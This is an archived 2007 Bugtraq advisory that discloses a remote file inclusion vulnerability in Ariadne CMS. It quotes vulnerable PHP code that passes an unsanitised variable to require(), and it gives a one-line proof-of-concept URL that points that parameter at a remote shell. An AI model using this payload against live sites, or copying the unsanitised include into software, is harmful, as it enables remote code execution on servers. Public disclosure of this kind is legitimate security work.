NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2007-08

Ariadne CMS Remote File Inclusion

AdvisoryAria-security.net
Date: Mon Aug 06 2007 - 16:41:32 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

_________________________

A R I A - S E C U R I T Y
_________________________

Ariadne CMS Remote File Inclusion
Vendor: http://www.ariadne-cms.org/

Source Code:

<?php
require("./ariadne.inc");
require($ariadne."/configs/ariadne.phtml");

  $PATH_INFO = $HTTP_SERVER_VARS["PATH_INFO"];
?>
<html>
<head>
  <script>
    function LoadingDone() {
parent.LoadingDone();
}

PoC:
http://site.com/path/view.php?ariadne=SHELL?

Credits: Aria-Security Team
http://Aria-Security.net
http://outlaw.aria-security.info

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]